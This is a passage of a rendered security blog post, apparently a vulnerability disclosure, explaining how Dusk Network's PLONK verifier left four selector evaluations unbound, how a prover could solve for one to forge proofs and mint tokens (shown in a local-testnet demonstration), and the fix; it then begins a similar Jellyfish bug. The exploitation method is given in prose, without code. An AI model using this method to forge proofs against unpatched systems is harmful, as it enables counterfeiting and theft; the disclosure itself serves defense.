signatures",{"type":26,"tag":3614,"props":4003,"children":4004},{},[4005],{"type":32,"value":4006},"The transaction payload is signed by the sender's two signing key components",{"type":26,"tag":3592,"props":4008,"children":4009},{},[4010,4020],{"type":26,"tag":3614,"props":4011,"children":4012},{},[4013],{"type":26,"tag":41,"props":4014,"children":4017},{"href":4015,"rel":4016},"https://github.com/dusk-network/phoenix/blob/1bb89b289b3d32115c49fdf80f7f4164578a283a/circuits/src/sender_enc.rs#L63-L121",[45],[4018],{"type":32,"value":4019},"Sender encryption correctness",{"type":26,"tag":3614,"props":4021,"children":4022},{},[4023],{"type":32,"value":4024},"The sender data attached to each output note is a correct ElGamal encryption under the recipient note key",{"type":26,"tag":35,"props":4026,"children":4027},{},[4028,4030,4036,4038,4047],{"type":32,"value":4029},"Rusk does not consume these claims one by one. It consumes a single valid/invalid proof verdict over ",{"type":26,"tag":130,"props":4031,"children":4033},{"className":4032},[],[4034],{"type":32,"value":4035},"tx.public_inputs()",{"type":32,"value":4037}," via ",{"type":26,"tag":41,"props":4039,"children":4041},{"href":3460,"rel":4040},[45],[4042],{"type":26,"tag":130,"props":4043,"children":4045},{"className":4044},[],[4046],{"type":32,"value":3468},{"type":32,"value":470},{"type":26,"tag":35,"props":4049,"children":4050},{},[4051],{"type":32,"value":4052},"A soundness break in PLONK voids all of these constraints simultaneously, because forged selector evaluations make the entire circuit unconstrained rather than targeting any single check.",{"type":26,"tag":3265,"props":4054,"children":4055},{},[],{"type":26,"tag":92,"props":4057,"children":4059},{"id":4058},"the-bug",[4060],{"type":32,"value":4061},"The bug",{"type":26,"tag":35,"props":4063,"children":4064},{},[4065,4067,4074,4076,4087],{"type":32,"value":4066},"In the ",{"type":26,"tag":41,"props":4068,"children":4071},{"href":4069,"rel":4070},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/proof.rs#L362-L400",[45],[4072],{"type":32,"value":4073},"PLONK verification",{"type":32,"value":4075},", the verifier batches polynomial evaluations into a single KZG opening proof check. The evaluations included in this batch (committed via ",{"type":26,"tag":41,"props":4077,"children":4080},{"href":4078,"rel":4079},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/proof.rs#L362-L373",[45],[4081],{"type":26,"tag":130,"props":4082,"children":4084},{"className":4083},[],[4085],{"type":32,"value":4086},"E_evals",{"type":32,"value":4088},") are:",{"type":26,"tag":3426,"props":4090,"children":4091},{},[4092,4124,4149,4174],{"type":26,"tag":3430,"props":4093,"children":4094},{},[4095,4101,4102,4108,4109,4115,4116,4122],{"type":26,"tag":130,"props":4096,"children":4098},{"className":4097},[],[4099],{"type":32,"value":4100},"a_eval",{"type":32,"value":1108},{"type":26,"tag":130,"props":4103,"children":4105},{"className":4104},[],[4106],{"type":32,"value":4107},"b_eval",{"type":32,"value":1108},{"type":26,"tag":130,"props":4110,"children":4112},{"className":4111},[],[4113],{"type":32,"value":4114},"c_eval",{"type":32,"value":1108},{"type":26,"tag":130,"props":4117,"children":4119},{"className":4118},[],[4120],{"type":32,"value":4121},"d_eval",{"type":32,"value":4123}," (witness)",{"type":26,"tag":3430,"props":4125,"children":4126},{},[4127,4133,4134,4140,4141,4147],{"type":26,"tag":130,"props":4128,"children":4130},{"className":4129},[],[4131],{"type":32,"value":4132},"s_sigma_1_eval",{"type":32,"value":1108},{"type":26,"tag":130,"props":4135,"children":4137},{"className":4136},[],[4138],{"type":32,"value":4139},"s_sigma_2_eval",{"type":32,"value":1108},{"type":26,"tag":130,"props":4142,"children":4144},{"className":4143},[],[4145],{"type":32,"value":4146},"s_sigma_3_eval",{"type":32,"value":4148}," (permutation)",{"type":26,"tag":3430,"props":4150,"children":4151},{},[4152,4158,4159,4165,4166,4172],{"type":26,"tag":130,"props":4153,"children":4155},{"className":4154},[],[4156],{"type":32,"value":4157},"a_w_eval",{"type":32,"value":1108},{"type":26,"tag":130,"props":4160,"children":4162},{"className":4161},[],[4163],{"type":32,"value":4164},"b_w_eval",{"type":32,"value":1108},{"type":26,"tag":130,"props":4167,"children":4169},{"className":4168},[],[4170],{"type":32,"value":4171},"d_w_eval",{"type":32,"value":4173}," (shifted witness)",{"type":26,"tag":3430,"props":4175,"children":4176},{},[4177,4183],{"type":26,"tag":130,"props":4178,"children":4180},{"className":4179},[],[4181],{"type":32,"value":4182},"z_eval",{"type":32,"value":4184}," (permutation accumulator)",{"type":26,"tag":35,"props":4186,"children":4187},{},[4188,4190,4195],{"type":32,"value":4189},"But the following selector evaluations were ",{"type":26,"tag":762,"props":4191,"children":4192},{},[4193],{"type":32,"value":4194},"not",{"type":32,"value":4196}," included:",{"type":26,"tag":3426,"props":4198,"children":4199},{},[4200,4211,4222,4233],{"type":26,"tag":3430,"props":4201,"children":4202},{},[4203,4209],{"type":26,"tag":130,"props":4204,"children":4206},{"className":4205},[],[4207],{"type":32,"value":4208},"q_arith_eval",{"type":32,"value":4210}," (arithmetic selector)",{"type":26,"tag":3430,"props":4212,"children":4213},{},[4214,4220],{"type":26,"tag":130,"props":4215,"children":4217},{"className":4216},[],[4218],{"type":32,"value":4219},"q_c_eval",{"type":32,"value":4221}," (constant selector)",{"type":26,"tag":3430,"props":4223,"children":4224},{},[4225,4231],{"type":26,"tag":130,"props":4226,"children":4228},{"className":4227},[],[4229],{"type":32,"value":4230},"q_l_eval",{"type":32,"value":4232}," (left selector)",{"type":26,"tag":3430,"props":4234,"children":4235},{},[4236,4242],{"type":26,"tag":130,"props":4237,"children":4239},{"className":4238},[],[4240],{"type":32,"value":4241},"q_r_eval",{"type":32,"value":4243}," (right selector)",{"type":26,"tag":35,"props":4245,"children":4246},{},[4247,4249,4256,4257,4264,4265,4272,4273,4280],{"type":32,"value":4248},"The prover places four selector evaluations in the proof struct. The verifier absorbs them into the transcript, and the widget verifier code uses them directly in the linearization check (",{"type":26,"tag":41,"props":4250,"children":4253},{"href":4251,"rel":4252},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/linearization_poly.rs#L33-L83",[45],[4254],{"type":32,"value":4255},"proof struct",{"type":32,"value":1108},{"type":26,"tag":41,"props":4258,"children":4261},{"href":4259,"rel":4260},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/proof.rs#L255-L286",[45],[4262],{"type":32,"value":4263},"transcript absorption",{"type":32,"value":1108},{"type":26,"tag":41,"props":4266,"children":4269},{"href":4267,"rel":4268},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/widget/arithmetic/verifierkey.rs#L92-L118",[45],[4270],{"type":32,"value":4271},"arithmetic widget",{"type":32,"value":1108},{"type":26,"tag":41,"props":4274,"children":4277},{"href":4275,"rel":4276},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/widget/ecc/scalar_mul/fixed_base/verifierkey.rs#L46-L102",[45],[4278],{"type":32,"value":4279},"fixed-base ECC widget",{"type":32,"value":4281},"). But they are never checked against the corresponding selector commitments in the verifier key, even though those commitments already exist. The prover sends whatever values it wants and the verifier trusts them.",{"type":26,"tag":35,"props":4283,"children":4284},{},[4285,4287,4291],{"type":32,"value":4286},"The easiest way to see why these four omissions are special is to contrast them with two nearby cases that are ",{"type":26,"tag":762,"props":4288,"children":4289},{},[4290],{"type":32,"value":4194},{"type":32,"value":4292}," bugs:",{"type":26,"tag":3426,"props":4294,"children":4295},{},[4296,4438],{"type":26,"tag":3430,"props":4297,"children":4298},{},[4299,4301,4347,4349,4355,4357,4362,4363,4368,4369,4374,4376,4382,4384,4429,4431,4436],{"type":32,"value":4300},"There is no prover-supplied ",{"type":26,"tag":130,"props":4302,"children":4304},{"className":4303},[133,134],[4305],{"type":26,"tag":137,"props":4306,"children":4308},{"className":4307},[140],[4309],{"type":26,"tag":137,"props":4310,"children":4312},{"className":4311,"ariaHidden":146},[145],[4313],{"type":26,"tag":137,"props":4314,"children":4316},{"className":4315},[151],[4317,4321,4327,4332,4337,4342],{"type":26,"tag":137,"props":4318,"children":4320},{"className":4319,"style":157},[156],[],{"type":26,"tag":137,"props":4322,"children":4324},{"className":4323},[169,170],[4325],{"type":32,"value":4326},"c",{"type":26,"tag":137,"props":4328,"children":4330},{"className":4329},[162],[4331],{"type":32,"value":165},{"type":26,"tag":137,"props":4333,"children":4335},{"className":4334,"style":2321},[169,170],[4336],{"type":32,"value":2324},{"type":26,"tag":137,"props":4338,"children":4340},{"className":4339,"style":190},[169,170],[4341],{"type":32,"value":2983},{"type":26,"tag":137,"props":4343,"children":4345},{"className":4344},[197],[4346],{"type":32,"value":200},{"type":32,"value":4348}," field at all. ",{"type":26,"tag":130,"props":4350,"children":4352},{"className":4351},[],[4353],{"type":32,"value":4354},"ProofEvaluations",{"type":32,"value":4356}," contains ",{"type":26,"tag":130,"props":4358,"children":4360},{"className":4359},[],[4361],{"type":32,"value":4157},{"type":32,"value":1108},{"type":26,"tag":130,"props":4364,"children":4366},{"className":4365},[],[4367],{"type":32,"value":4164},{"type":32,"value":3525},{"type":26,"tag":130,"props":4370,"children":4372},{"className":4371},[],[4373],{"type":32,"value":4171},{"type":32,"value":4375},", but no ",{"type":26,"tag":130,"props":4377,"children":4379},{"className":4378},[],[4380],{"type":32,"value":4381},"c_w_eval",{"type":32,"value":4383},", so the verifier never consumes an unbound ",{"type":26,"tag":130,"props":4385,"children":4387},{"className":4386},[133,134],[4388],{"type":26,"tag":137,"props":4389,"children":4391},{"className":4390},[140],[4392],{"type":26,"tag":137,"props":4393,"children":4395},{"className":4394,"ariaHidden":146},[145],[4396],{"type":26,"tag":137,"props":4397,"children":4399},{"className":4398},[151],[4400,4404,4409,4414,4419,4424],{"type":26,"tag":137,"props":4401,"children":4403},{"className":4402,"style":157},[156],[],{"type":26,"tag":137,"props":4405,"children":4407},{"className":4406},[169,170],[4408],{"type":32,"value":4326},{"type":26,"tag":137,"props":4410,"children":4412},{"className":4411},[162],[4413],{"type":32,"value":165},{"type":26,"tag":137,"props":4415,"children":4417},{"className":4416,"style":2321},[169,170],[4418],{"type":32,"value":2324},{"type":26,"tag":137,"props":4420,"children":4422},{"className":4421,"style":190},[169,170],[4423],{"type":32,"value":2983},{"type":26,"tag":137,"props":4425,"children":4427},{"className":4426},[197],[4428],{"type":32,"value":200},{"type":32,"value":4430}," claim (",{"type":26,"tag":41,"props":4432,"children":4434},{"href":4251,"rel":4433},[45],[4435],{"type":32,"value":4255},{"type":32,"value":4437},").",{"type":26,"tag":3430,"props":4439,"children":4440},{},[4441,4443,4530,4532,4624,4626,4633],{"type":32,"value":4442},"There is a fourth permutation commitment ",{"type":26,"tag":130,"props":4444,"children":4446},{"className":4445},[133,134],[4447],{"type":26,"tag":137,"props":4448,"children":4450},{"className":4449},[140],[4451],{"type":26,"tag":137,"props":4452,"children":4454},{"className":4453,"ariaHidden":146},[145],[4455],{"type":26,"tag":137,"props":4456,"children":4458},{"className":4457},[151],[4459,4463,4468,4525],{"type":26,"tag":137,"props":4460,"children":4462},{"className":4461,"style":157},[156],[],{"type":26,"tag":137,"props":4464,"children":4466},{"className":4465},[162],[4467],{"type":32,"value":3016},{"type":26,"tag":137,"props":4469,"children":4471},{"className":4470},[169],[4472,4477],{"type":26,"tag":137,"props":4473,"children":4475},{"className":4474,"style":190},[169,170],[4476],{"type":32,"value":2878},{"type":26,"tag":137,"props":4478,"children":4480},{"className":4479},[236],[4481],{"type":26,"tag":137,"props":4482,"children":4484},{"className":4483},[241,417],[4485,4514],{"type":26,"tag":137,"props":4486,"children":4488},{"className":4487},[246],[4489,4509],{"type":26,"tag":137,"props":4490,"children":4492},{"className":4491,"style":426},[251],[4493],{"type":26,"tag":137,"props":4494,"children":4495},{"style":819},[4496,4500],{"type":26,"tag":137,"props":4497,"children":4499},{"className":4498,"style":262},[261],[],{"type":26,"tag":137,"props":4501,"children":4503},{"className":4502},[267,268,269,270],[4504],{"type":26,"tag":137,"props":4505,"children":4507},{"className":4506},[169,270],[4508],{"type":32,"value":3235},{"type":26,"tag":137,"props":4510,"children":4512},{"className":4511},[453],[4513],{"type":32,"value":456},{"type":26,"tag":137,"props":4515,"children":4517},{"className":4516},[246],[4518],{"type":26,"tag":137,"props":4519,"children":4521},{"className":4520,"style":464},[251],[4522],{"type":26,"tag":137,"props":4523,"children":4524},{},[],{"type":26,"tag":137,"props":4526,"children":4528},{"className":4527},[197],[4529],{"type":32,"value":3079},{"type":32,"value":4531}," in the verifier key, but the verifier uses the commitment itself inside the linearization MSM rather than trusting a prover-supplied scalar ",{"type":26,"tag":130,"props":4533,"children":4535},{"className":4534},[133,134],[4536],{"type":26,"tag":137,"props":4537,"children":4539},{"className":4538},[140],[4540],{"type":26,"tag":137,"props":4541,"children":4543},{"className":4542,"ariaHidden":146},[145],[4544],{"type":26,"tag":137,"props":4545,"children":4547},{"className":4546},[151],[4548,4552,4609,4614,4619],{"type":26,"tag":137,"props":4549,"children":4551},{"className":4550,"style":157},[156],[],{"type":26,"tag":137,"props":4553,"children":4555},{"className":4554},[169],[4556,4561],{"type":26,"tag":137,"props":4557,"children":4559},{"className":4558,"style":190},[169,170],[4560],{"type":32,"value":2878},{"type":26,"tag":137,"props":4562,"children":4564},{"className":4563},[236],[4565],{"type":26,"tag":137,"props":4566,"children":4568},{"className":4567},[241,417],[4569,4598],{"type":26,"tag":137,"props":4570,"children":4572},{"className":4571},[246],[4573,4593],{"type":26,"tag":137,"props":4574,"children":4576},{"className":4575,"style":426},[251],[4577],{"type":26,"tag":137,"props":4578,"children":4579},{"style":819},[4580,4584],{"type":26,"tag":137,"props":4581,"children":4583},{"className":4582,"style":262},[261],[],{"type":26,"tag":137,"props":4585,"children":4587},{"className":4586},[267,268,269,270],[4588],{"type":26,"tag":137,"props":4589,"children":4591},{"className":4590},[169,270],[4592],{"type":32,"value":3235},{"type":26,"tag":137,"props":4594,"children":4596},{"className":4595},[453],[4597],{"type":32,"value":456},{"type":26,"tag":137,"props":4599,"children":4601},{"className":4600},[246],[4602],{"type":26,"tag":137,"props":4603,"children":4605},{"className":4604,"style":464},[251],[4606],{"type":26,"tag":137,"props":4607,"children":4608},{},[],{"type":26,"tag":137,"props":4610,"children":4612},{"className":4611},[162],[4613],{"type":32,"value":165},{"type":26,"tag":137,"props":4615,"children":4617},{"className":4616,"style":2321},[169,170],[4618],{"type":32,"value":2324},{"type":26,"tag":137,"props":4620,"children":4622},{"className":4621},[197],[4623],{"type":32,"value":200},{"type":32,"value":4625}," (",{"type":26,"tag":41,"props":4627,"children":4630},{"href":4628,"rel":4629},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/widget/permutation/verifierkey.rs#L24-L104",[45],[4631],{"type":32,"value":4632},"permutation verifier key",{"type":32,"value":4437},{"type":26,"tag":35,"props":4635,"children":4636},{},[4637,4639,4649],{"type":32,"value":4638},"The four selector evaluations fit neither of these safe patterns: they are prover-supplied scalars, they are used directly by verifier code, and they never appear in ",{"type":26,"tag":41,"props":4640,"children":4643},{"href":4641,"rel":4642},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/proof.rs#L361-L373",[45],[4644],{"type":26,"tag":130,"props":4645,"children":4647},{"className":4646},[],[4648],{"type":32,"value":4086},{"type":32,"value":4650},", which leaves the master equation underconstrained.",{"type":26,"tag":35,"props":4652,"children":4653},{},[4654],{"type":26,"tag":2210,"props":4655,"children":4658},{"alt":4656,"src":4657},"structural_trust_boundary","/posts/dusk-commitment-issues/structural_trust_boundary.svg",[],{"type":26,"tag":3265,"props":4660,"children":4661},{},[],{"type":26,"tag":92,"props":4663,"children":4665},{"id":4664},"the-exploitation",[4666],{"type":32,"value":4667},"The exploitation",{"type":26,"tag":35,"props":4669,"children":4670},{},[4671],{"type":32,"value":4672},"Since the selector evaluations are free variables, the verification equation becomes a linear equation the prover can solve after the fact.",{"type":26,"tag":35,"props":4674,"children":4675},{},[4676,4678,4684,4686,4691,4693,4698,4700,4706],{"type":32,"value":4677},"The prover commits to arbitrary witness polynomials, without needing a valid witness, and arbitrary quotient polynomials, where small random linear polynomials suffice. It follows the honest protocol through all commitment rounds, deriving the same challenges the verifier will. After seeing ",{"type":26,"tag":130,"props":4679,"children":4681},{"className":4680},[],[4682],{"type":32,"value":4683},"z_challenge",{"type":32,"value":4685},", it computes what the linearization polynomial ",{"type":26,"tag":762,"props":4687,"children":4688},{},[4689],{"type":32,"value":4690},"should",{"type":32,"value":4692}," evaluate to for the pairing check to pass, then solves for ",{"type":26,"tag":130,"props":4694,"children":4696},{"className":4695},[],[4697],{"type":32,"value":4208},{"type":32,"value":4699},", the single free variable that makes the verification equation balance (setting ",{"type":26,"tag":130,"props":4701,"children":4703},{"className":4702},[],[4704],{"type":32,"value":4705},"q_c_eval = q_l_eval = q_r_eval = 0",{"type":32,"value":4437},{"type":26,"tag":35,"props":4708,"children":4709},{},[4710],{"type":26,"tag":2210,"props":4711,"children":4714},{"alt":4712,"src":4713},"exploit_algebra","/posts/dusk-commitment-issues/exploit_algebra.svg",[],{"type":26,"tag":35,"props":4716,"children":4717},{},[4718,4720,4760,4762,4787,4789,4794],{"type":32,"value":4719},"To achieve this one may compute the linearization polynomial ",{"type":26,"tag":130,"props":4721,"children":4723},{"className":4722},[133,134],[4724],{"type":26,"tag":137,"props":4725,"children":4727},{"className":4726},[140],[4728],{"type":26,"tag":137,"props":4729,"children":4731},{"className":4730,"ariaHidden":146},[145],[4732],{"type":26,"tag":137,"props":4733,"children":4735},{"className":4734},[151],[4736,4740,4745,4750,4755],{"type":26,"tag":137,"props":4737,"children":4739},{"className":4738,"style":157},[156],[],{"type":26,"tag":137,"props":4741,"children":4743},{"className":4742,"style":621},[169,170],[4744],{"type":32,"value":624},{"type":26,"tag":137,"props":4746,"children":4748},{"className":4747},[162],[4749],{"type":32,"value":165},{"type":26,"tag":137,"props":4751,"children":4753},{"className":4752},[169,170],[4754],{"type":32,"value":173},{"type":26,"tag":137,"props":4756,"children":4758},{"className":4757},[197],[4759],{"type":32,"value":200},{"type":32,"value":4761}," with all selectors set to zero, evaluating it at ",{"type":26,"tag":130,"props":4763,"children":4765},{"className":4764},[133,134],[4766],{"type":26,"tag":137,"props":4767,"children":4769},{"className":4768},[140],[4770],{"type":26,"tag":137,"props":4771,"children":4773},{"className":4772,"ariaHidden":146},[145],[4774],{"type":26,"tag":137,"props":4775,"children":4777},{"className":4776},[151],[4778,4782],{"type":26,"tag":137,"props":4779,"children":4781},{"className":4780,"style":1542},[156],[],{"type":26,"tag":137,"props":4783,"children":4785},{"className":4784,"style":2321},[169,170],[4786],{"type":32,"value":2324},{"type":32,"value":4788},", and comparing to the target value; the difference divided by the coefficient of ",{"type":26,"tag":130,"props":4790,"children":4792},{"className":4791},[],[4793],{"type":32,"value":4208},{"type":32,"value":4795}," gives the required value in a single field division.",{"type":26,"tag":3265,"props":4797,"children":4798},{},[],{"type":26,"tag":92,"props":4800,"children":4802},{"id":4801},"impact-on-dusk-network",[4803],{"type":32,"value":4804},"Impact on Dusk Network",{"type":26,"tag":35,"props":4806,"children":4807},{},[4808,4810,4817],{"type":32,"value":4809},"PLONK is the sole gatekeeper for Phoenix-specific correctness claims: note membership, ownership, note commitments, sender-authorship, and balance integrity are encoded entirely in the circuit. Rusk does check other preconditions such as nullifier uniqueness before it verifies the proof (",{"type":26,"tag":41,"props":4811,"children":4814},{"href":4812,"rel":4813},"https://github.com/dusk-network/rusk/blob/264c1ec0f4c005ef043b87deb1c866035e034330/rusk/src/lib/node/vm.rs#L153-L184",[45],[4815],{"type":32,"value":4816},"preverify path",{"type":32,"value":4818},"), but for the claims inside the proof there is no secondary validation path. With forged proofs, an attacker could:",{"type":26,"tag":4820,"props":4821,"children":4822},"ol",{},[4823,4828,4833],{"type":26,"tag":3430,"props":4824,"children":4825},{},[4826],{"type":32,"value":4827},"Inflate the token supply by fabricating input notes that do not exist in the note tree, with arbitrary values. The forged proof convinces the network these notes are real, and the attacker mints DUSK out of nothing, ready to transfer to honest users or exchanges.",{"type":26,"tag":3430,"props":4829,"children":4830},{},[4831],{"type":32,"value":4832},"Forge spends that bypass the ownership, membership, and balance checks that normally make a Phoenix input note valid.",{"type":26,"tag":3430,"props":4834,"children":4835},{},[4836],{"type":32,"value":4837},"Move forged shielded funds through honest wallets, because once a forged Phoenix transaction is accepted, the resulting shielded outputs are not distinguishable from legitimate Phoenix outputs at the protocol level.",{"type":26,"tag":35,"props":4839,"children":4840},{},[4841],{"type":32,"value":4842},"We demonstrated this with a full end-to-end proof-of-concept on a local Dusk testnet:",{"type":26,"tag":4820,"props":4844,"children":4845},{},[4846,4851,4861,4873,4878],{"type":26,"tag":3430,"props":4847,"children":4848},{},[4849],{"type":32,"value":4850},"Set up a single honest Rusk node and create two wallets (honest and malicious), both with balance 0",{"type":26,"tag":3430,"props":4852,"children":4853},{},[4854,4856],{"type":32,"value":4855},"The malicious wallet forges a PLONK proof to create ",{"type":26,"tag":84,"props":4857,"children":4858},{},[4859],{"type":32,"value":4860},"2000 DUSK from nothing",{"type":26,"tag":3430,"props":4862,"children":4863},{},[4864,4866,4871],{"type":32,"value":4865},"The malicious wallet transfers ",{"type":26,"tag":84,"props":4867,"children":4868},{},[4869],{"type":32,"value":4870},"1337 DUSK",{"type":32,"value":4872}," to the honest wallet using a normal (honestly-proved) transaction",{"type":26,"tag":3430,"props":4874,"children":4875},{},[4876],{"type":32,"value":4877},"The honest node validates both transactions and mines them into blocks",{"type":26,"tag":3430,"props":4879,"children":4880},{},[4881],{"type":32,"value":4882},"The honest wallet shows a confirmed balance of 1337 DUSK",{"type":26,"tag":35,"props":4884,"children":4885},{},[4886],{"type":26,"tag":2210,"props":4887,"children":4890},{"alt":4888,"src":4889},"end_to_end","/posts/dusk-commitment-issues/end_to_end.svg",[],{"type":26,"tag":35,"props":4892,"children":4893},{},[4894,4896,4902,4904,4911],{"type":32,"value":4895},"At the time of discovery, DUSK's market cap was roughly ",{"type":26,"tag":41,"props":4897,"children":4899},{"href":62,"rel":4898},[45],[4900],{"type":32,"value":4901},"~60M",{"type":32,"value":4903},". The entire shielded transaction layer was at risk. Because Phoenix is privacy-preserving, forged outputs accepted into the shielded pool would have been difficult to distinguish after the fact, similar to Neptune Cash with the ",{"type":26,"tag":41,"props":4905,"children":4908},{"href":4906,"rel":4907},"https://neptune.cash/articles/critical-vulnerability-disclosure",[45],[4909],{"type":32,"value":4910},"Triton VM vulnerability",{"type":32,"value":470},{"type":26,"tag":3265,"props":4913,"children":4914},{},[],{"type":26,"tag":92,"props":4916,"children":4918},{"id":4917},"the-fix",[4919],{"type":32,"value":4920},"The fix",{"type":26,"tag":35,"props":4922,"children":4923},{},[4924],{"type":32,"value":4925},"The fix adds the four selector evaluations to the KZG batch opening check, so they are verified against the selector commitments already present in the verifier key:",{"type":26,"tag":3426,"props":4927,"children":4928},{},[4929,4974],{"type":26,"tag":3430,"props":4930,"children":4931},{},[4932,4934,4945,4947,4953,4954,4960,4961,4967,4968],{"type":32,"value":4933},"Extend ",{"type":26,"tag":41,"props":4935,"children":4938},{"href":4936,"rel":4937},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/compiler/prover.rs#L509",[45],[4939],{"type":26,"tag":130,"props":4940,"children":4942},{"className":4941},[],[4943],{"type":32,"value":4944},"compute_aggregate_witness",{"type":32,"value":4946}," on the prover side to also include ",{"type":26,"tag":130,"props":4948,"children":4950},{"className":4949},[],[4951],{"type":32,"value":4952},"q_arith",{"type":32,"value":1108},{"type":26,"tag":130,"props":4955,"children":4957},{"className":4956},[],[4958],{"type":32,"value":4959},"q_c",{"type":32,"value":1108},{"type":26,"tag":130,"props":4962,"children":4964},{"className":4963},[],[4965],{"type":32,"value":4966},"q_l",{"type":32,"value":3525},{"type":26,"tag":130,"props":4969,"children":4971},{"className":4970},[],[4972],{"type":32,"value":4973},"q_r",{"type":26,"tag":3430,"props":4975,"children":4976},{},[4977,4979,4989],{"type":32,"value":4978},"Add their evaluations to ",{"type":26,"tag":41,"props":4980,"children":4983},{"href":4981,"rel":4982},"https://github.com/dusk-network/plonk/blob/82c08e8f11f2db774e4e8d28e6ba7ef833cbff25/src/proof_system/proof.rs#L362",[45],[4984],{"type":26,"tag":130,"props":4985,"children":4987},{"className":4986},[],[4988],{"type":32,"value":4086},{"type":32,"value":4990}," on the verifier side, so they're checked against the commitments in the verifier key",{"type":26,"tag":35,"props":4992,"children":4993},{},[4994,4996,5003],{"type":32,"value":4995},"This was done in ",{"type":26,"tag":41,"props":4997,"children":5000},{"href":4998,"rel":4999},"https://github.com/dusk-network/plonk/commit/645265b748d2698bcb403b794fc2d58340b340f1",[45],[5001],{"type":32,"value":5002},"commit 645265b7",{"type":32,"value":5004},", which landed on February 14, 2026.",{"type":26,"tag":3265,"props":5006,"children":5007},{},[],{"type":26,"tag":92,"props":5009,"children":5011},{"id":5010},"why-was-this-missed",[5012],{"type":32,"value":5013},"Why was this missed?",{"type":26,"tag":35,"props":5015,"children":5016},{},[5017,5019,5026,5028,5035,5037,5044,5046,5053],{"type":32,"value":5018},"Dusk's stack had been heavily audited: a ",{"type":26,"tag":41,"props":5020,"children":5023},{"href":5021,"rel":5022},"https://github.com/dusk-network/audits/blob/main/core-audits/2023-12_plonk-audit-report_porter-adams.pdf",[45],[5024],{"type":32,"value":5025},"December 2023 audit of dusk-plonk",{"type":32,"value":5027},", a ",{"type":26,"tag":41,"props":5029,"children":5032},{"href":5030,"rel":5031},"https://github.com/dusk-network/audits/blob/main/core-audits/2024-09_phoenix-audit-report_jules-de-smit.pdf",[45],[5033],{"type":32,"value":5034},"September 2024 audit of Phoenix",{"type":32,"value":5036},", and a ",{"type":26,"tag":41,"props":5038,"children":5041},{"href":5039,"rel":5040},"https://github.com/dusk-network/audits/blob/main/core-audits/2024-09_rusk-node-library_oak-security.pdf",[45],[5042],{"type":32,"value":5043},"September 2024 Oak Security audit of the Rusk node library",{"type":32,"value":5045},". Dusk's public ",{"type":26,"tag":41,"props":5047,"children":5050},{"href":5048,"rel":5049},"https://dusk.network/news/audits-overview",[45],[5051],{"type":32,"value":5052},"audits overview",{"type":32,"value":5054}," summarizes the broader audit program. The bug still went unnoticed because it hides behind a very easy mental-model mistake.",{"type":26,"tag":35,"props":5056,"children":5057},{},[5058,5060,5065],{"type":32,"value":5059},"At the polynomial level, selectors are public circuit descriptions. A reviewer who keeps that standard PLONK model in mind will naturally think \"selectors are verifier-side\" and move on, overlooking the architectural deviation where Dusk's verifier started consuming prover-supplied selector ",{"type":26,"tag":762,"props":5061,"children":5062},{},[5063],{"type":32,"value":5064},"evaluations",{"type":32,"value":470},{"type":26,"tag":35,"props":5067,"children":5068},{},[5069],{"type":32,"value":5070},"This was a pure proof-system bug, not a Phoenix-circuit bug; the circuit constraints themselves were correctly written. The failure occurred entirely because the verifier accepted proof fields that bypassed the fundamental invariant established earlier: they were neither locally computed nor cryptographically bound to an opening proof.",{"type":26,"tag":35,"props":5072,"children":5073},{},[5074],{"type":32,"value":5075},"The check for this class of bug is mechanical: enumerate every field in the proof's evaluation struct and verify that each one either appears in the opening proof batch or is computed locally by the verifier.",{"type":26,"tag":92,"props":5077,"children":5079},{"id":5078},"a-similar-bug-in-espresso-systems-jellyfish",[5080],{"type":32,"value":5081},"A similar bug in Espresso Systems' Jellyfish",{"type":26,"tag":35,"props":5083,"children":5084},{},[5085,5087,5094],{"type":32,"value":5086},"While investigating PLONK implementations, we found a similar vulnerability in ",{"type":26,"tag":41,"props":5088,"children":5091},{"href":5089,"rel":5090},"https://github.com/EspressoSystems/jellyfish/",[45],[5092],{"type":32,"value":5093},"jf-plonk",{"type":32,"value":5095}," by Espresso Systems. The exact mechanism is different, but the exploitation also boils down to variables that are used in the final check not being cryptographically bound.",{"type":26,"tag":35,"props":5097,"children":5098},{},[5099,5101,5108,5110,5121,5123,5149,5151,5176],{"type":32,"value":5100},"Jellyfish implements UltraPlonk, which extends standard PLONK with ",{"type":26,"tag":41,"props":5102,"children":5105},{"href":5103,"rel":5104},"https://eprint.iacr.org/2020/315",[45],[5106],{"type":32,"value":5107},"Plookup",{"type":32,"value":5109}," lookup arguments. Plookup adds 15 polynomial evaluations to the proof. The function ",{"type":26,"tag":41,"props":5111,"children":5114},{"href":5112,"rel":5113},"https://github.com/EspressoSystems/jellyfish/blob/83e62ed43140d251f8a972033fdd9ddb717c66d7/plonk/src/transcript/mod.rs#L156-L166",[45],[5115],{"type":26,"tag":130,"props":5116,"children":5118},{"className":5117},[],[5119],{"type":32,"value":5120},"append_plookup_evaluations",{"type":32,"value":5122}," was supposed to add all 15 to the Fiat-Shamir transcript before the batching challenge ",{"type":26,"tag":130,"props":5124,"children":5126},{"className":5125},[133,134],[5127],{"type":26,"tag":137,"props":5128,"children":5130},{"className":5129},[140],[5131],{"type":26,"tag":137,"props":5132,"children":5134},{"className":5133,"ariaHidden":146},[145],[5135],{"type":26,"tag":137,"props":5136,"children":5138},{"className":5137},[151],[5139,5143],{"type":26,"tag":137,"props":5140,"children":5142},{"className":5141,"style":1542},[156],[],{"type":26,"tag":137,"props":5144,"children":5146},{"className":5145,"style":190},[169,170],[5147],{"type":32,"value":5148},"v",{"type":32,"value":5150}," is derived. Instead, it only added 6 of the 15, and the remaining 9 evaluations are used in the batched verification check but don't influence 